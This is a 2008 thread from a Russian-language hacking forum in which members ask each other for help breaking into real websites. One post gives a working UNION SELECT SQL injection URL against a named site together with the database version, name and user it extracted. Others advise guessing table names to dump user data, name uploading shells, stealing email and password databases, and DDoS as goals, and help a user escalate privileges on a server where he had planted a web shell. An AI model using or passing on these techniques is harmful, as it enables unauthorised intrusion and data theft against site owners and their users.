Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ссылку то кинешь или тебе на руке погадать?
     
    2 people like this.
  2. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Мне в этом примере интересен сам процесс. Как обошел?
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Спс что ответили Вельке :Р
     
  4. Zergius

    Zergius New Member

    Joined:
    4 Dec 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    У мну вопрос по SQL (сразу в эту тему не пинать.
    Я нашел "xspider"ом дыру вот такого типа http://www.site.ru/forum/index.php?showforum=2&prune_day=100&sort_by=Z-A&sort_key=last_post&category1=1'&st=25
    Выдает
    mySQL query error: SELECT COUNT(tid) as max FROM ibf_topics WHERE forum_id=2 and approved=1 and (pinned=1 or last_post > 0) AND category1=1'

    mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
    mySQL error code:
    Date: Wednesday 07th of May 2008 05:52:48 PM
    Че с этим добром делать, мне не понятно =((
    Просьба помочь...
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано.

    з.ы. https://forum.antichat.ru/thread19605.html вот :)

    з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..
     
    #1885 n0ne, 7 May 2008
    Last edited: 7 May 2008
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    Читал статью тоже так же ниче не получилось
     
  7. Zergius

    Zergius New Member

    Joined:
    4 Dec 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу...
    Млин, все равно не догоняю =(((
     
  8. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10,11,12,13,14/*
    4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost

    Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.
     
  9. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    f5
     
  10. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
    А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
     
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь.

    Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.
     
    2 people like this.
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет)
    Сор за капс
     
  13. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?
     
  14. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Zergius не волнуйся у мя такая же трабла со школьным сайтом((
     
  15. criz

    criz Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    293
    Likes Received:
    40
    Reputations:
    6
    Можно узнать пасс админа и права поднимутся :)
    Заюзать сплойтенг, которые сделает тебя рутом =)
     
  16. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.
     
  17. criz

    criz Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    293
    Likes Received:
    40
    Reputations:
    6
    Sharingan, знаешь какая ОС? :)
    Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине
     
  18. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    FreeBSD 6.2-RELEASE-p5
    Server: Apache
    safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
    если на таком шелл стоит реально ли права поднять?
     
  19. criz

    criz Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    293
    Likes Received:
    40
    Reputations:
    6
    Сейф мода нет...дас ист гут :)
    Вот, поищи тут:
    http://milw0rm.org/search.php
    Лучше в поиск вбивать названия демонов :)
     
  20. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Кто нибудь подскажет как обойти фильтр последовательности union select from?
    ----------------------------------
    читал, но вопрос остался
     
    #1900 samarin, 8 May 2008
    Last edited: 8 May 2008
Thread Status:
Not open for further replies.